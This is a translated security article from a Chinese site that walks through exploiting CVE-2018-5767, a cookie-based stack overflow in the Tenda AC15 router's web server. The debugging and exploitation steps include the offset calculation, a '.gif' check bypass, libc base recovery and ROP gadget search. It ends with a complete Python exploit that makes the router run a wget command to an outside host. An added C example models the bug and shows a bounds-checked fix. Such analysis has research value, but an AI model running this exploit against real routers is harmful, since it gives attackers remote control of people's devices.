Router vulnerability analysis, part five: CVE-2018-5767 router remote code execution (vulnerability warning) - the black bar safety net

Source: www.myhack58.com (MYHACK58:62201890053), author 佚名 (anonymous)
Date: 2018-04-24 00:00:00
EPSS: 0.115 (Low), percentile 95.3%

  1. Vulnerability overview
    CVE-2018-5767: Tenda AC15 router remote code execution
    Reference: https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/
    Vulnerable firmware version:
    Tenda cn AC15_firmware 15.03.1.16
  2. Vulnerability analysis
    The vulnerable file is bin/httpd.
    Here the value following "password" in the Cookie header is copied into the stack variable var_1c0 without any length check, causing a stack overflow.
    ![](/Article/UploadPic/2018-4/2018424183144648.png?www.myhack58.com)
    The ARM binary is little-endian.
    ![](/Article/UploadPic/2018-4/2018424183144798.png?www.myhack58.com)
    First copy the ARM user-mode qemu binary into the firmware root:
    cp $(which qemu-arm-static) ./qemu
    Use the following script to debug (run it from the extracted firmware root, which becomes the chroot; -g makes qemu wait for a gdb connection on the given port):
    #!/bin/bash
    PORT="1234"
    chroot . ./qemu -g "$PORT" ./bin/httpd
    Here the return value of connectcfm needs to be patched to 1:
    ![](/Article/UploadPic/2018-4/2018424183144655.png?www.myhack58.com)
    The keypatch plugin is recommended; it lets you modify instructions directly in IDA: https://github.com/keystone-engine/keypatch
    ![](/Article/UploadPic/2018-4/2018424183144167.png?www.myhack58.com)
    After that the http service comes up:
    ![](/Article/UploadPic/2018-4/2018424183144422.png?www.myhack58.com)
    Set a breakpoint at R7WebsSecurityHandler, run exploit.py, and it breaks here:
    ![](/Article/UploadPic/2018-4/2018424183145863.png?www.myhack58.com)
    LR, which holds the return address, is stored at FECDC, and var_1c0, which holds the controlled input, is at FEB1C, so the payload is "A" * (FECDC - FEB1C) + "BBBB" (to overwrite the return address) + "ccccdddd". Running it, execution did not break at pc=42424242; instead it faulted on the [R3] access.
    ![](/Article/UploadPic/2018-4/2018424183145906.png?www.myhack58.com)
    After the full password has been copied, the code also checks whether the string contains "." and whether the three characters after the "." are "gif"; if so it jumps straight to the end and never reaches the [R3] read. Adding ".gif" to the payload makes pc crash at 42424242.
    ![](/Article/UploadPic/2018-4/2018424183145324.png?www.myhack58.com)
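To make the defect concrete from the fixing side, the following is an added example in C; it is not part of the article and not the Tenda httpd code. It is a small model of the cookie handling the analysis describes (a 0x1c0-byte stack buffer, the copy of the value after password=, and the ".gif" check that only runs after the copy) beside a hardened handler that rejects over-length values before copying. The function names, the cookie parsing and the constructed sample cookies are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical model of the cookie handling described in the analysis.
 * This is NOT the Tenda httpd code; it only reconstructs the shape of the
 * bug: the value after "password=" is copied into a stack buffer at frame
 * offset -0x1c0 (448 bytes) with no length check. */
#define PASS_BUF_LEN 0x1c0

/* Returns a pointer to the value following "password=" in a Cookie header
 * and its length, or NULL if absent. Assumes the value runs to the next
 * ';' or to the end of the string (an assumption of this model). */
static const char *cookie_password_value(const char *cookie, size_t *len) {
    const char *p = strstr(cookie, "password=");
    if (!p) return NULL;
    p += strlen("password=");
    const char *end = strchr(p, ';');
    *len = end ? (size_t)(end - p) : strlen(p);
    return p;
}

/* The post-copy check the analysis describes: does the string contain a
 * '.' followed by "gif"? Because it runs after the copy it cannot prevent
 * the overflow; it only changes which code path runs afterwards. */
int has_dot_gif(const char *s) {
    const char *dot = strchr(s, '.');
    return dot != NULL && strncmp(dot + 1, "gif", 3) == 0;
}

/* Vulnerable form (modelled on the analysis): unbounded copy into a fixed
 * stack buffer. Any value longer than PASS_BUF_LEN - 1 bytes overwrites the
 * saved registers, including the return address saved from LR. Kept here
 * for comparison and only ever called with short input. */
int handle_cookie_unsafe(const char *cookie) {
    char password[PASS_BUF_LEN];
    size_t len;
    const char *v = cookie_password_value(cookie, &len);
    if (!v) return -1;
    memcpy(password, v, len);      /* no bound check: the bug */
    password[len] = '\0';
    (void)has_dot_gif(password);   /* too late to matter for the overflow */
    return (int)len;
}

/* Hardened form: refuse over-length values before any byte is copied. */
int handle_cookie_safe(const char *cookie) {
    char password[PASS_BUF_LEN];
    size_t len;
    const char *v = cookie_password_value(cookie, &len);
    if (!v) return -1;
    if (len >= sizeof password) {
        /* over-length value: log it and reject the request */
        fprintf(stderr, "password cookie too long (%zu bytes), rejecting\n", len);
        return -2;
    }
    memcpy(password, v, len);
    password[len] = '\0';
    return (int)len;
}

/* Builds a constructed Cookie header whose password value is n bytes of 'A'
 * and returns the hardened handler's verdict (n is capped to fit buf). */
int check_password_length(size_t n) {
    char buf[1024];
    if (n > sizeof buf - 16) n = sizeof buf - 16;
    memcpy(buf, "password=", 9);
    memset(buf + 9, 'A', n);
    buf[9 + n] = '\0';
    return handle_cookie_safe(buf);
}
```

Calling check_password_length(447) succeeds while check_password_length(448) returns -2: the rejection threshold is exactly the buffer size, so the saved return address can never be reached. The ".gif" quirk is deliberately not relied on, because a check that runs after the copy cannot undo an overflow that has already happened.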
    With NX enabled, code on the stack cannot be executed directly, so a ROP chain is required.
    ![](/Article/UploadPic/2018-4/2018424183145952.png?www.myhack58.com)
    Find the libc base address:
    ![](/Article/UploadPic/2018-4/2018424183145215.png?www.myhack58.com)
    Libc=0x409c7000
    But there is a pitfall here: this libc address is wrong, and the ROP chain jumps to the wrong place.
    Look at the address of the puts function:
    ![](/Article/UploadPic/2018-4/2018424183146285.png?www.myhack58.com)
    The address of puts within libc:
    ![](/Article/UploadPic/2018-4/2018424183146806.png?www.myhack58.com)
    Then libc = 409dccd4 - 35cd4 = 409A7000
    libc contains system, so we need a gadget such as "mov r0, sp" that moves the command parameter on the stack into r0:
    ROPgadget --binary=./lib/libc.so.0 | grep "mov r0, sp"
    Or use --only "pop" | grep "r0", but the "pop {r0, pc}" instruction cannot be used because the r0 argument is too long, so pc has to be placed later. The following two gadgets are found:
    ![](/Article/UploadPic/2018-4/2018424183146968.png?www.myhack58.com)
    ![](/Article/UploadPic/2018-4/2018424183146145.png?www.myhack58.com)
    The first pops the address of system into r3, and the second moves the command parameter on the stack into r0 and branches to r3.
    Construct exploit.py as follows:
    #!/usr/bin/env python2
    import struct
    import sys
    import urllib2

    host = sys.argv[1]                          # router address
    url = "http://%s:80/goform/exeCommand" % (host)
    libc = 0x409a7000                           # corrected libc base (see above)
    godget1 = 0x00018298                        # pop {r3, pc}
    godget1 = struct.pack("<I", godget1 + libc) # 32-bit little-endian, matching the ARM target
    system = 0x0005A270
    system = struct.pack("<I", system + libc)
    command = "wget 192.168.174.136"
    godget2 = 0x00040cb8                        # mov r0, sp; blx r3
    godget2 = struct.pack("<I", godget2 + libc)
    # 444 bytes of padding plus ".gif" fills var_1c0 (0x1c0 = 448 bytes) up to the saved return address
    password = "A" * 444 + ".gif" + godget1 + system + godget2 + command
    req = urllib2.Request(url)
    req.add_header("Cookie", "password=%s" % password)
    try:
        resp = urllib2.urlopen(req)
    except:
        pass
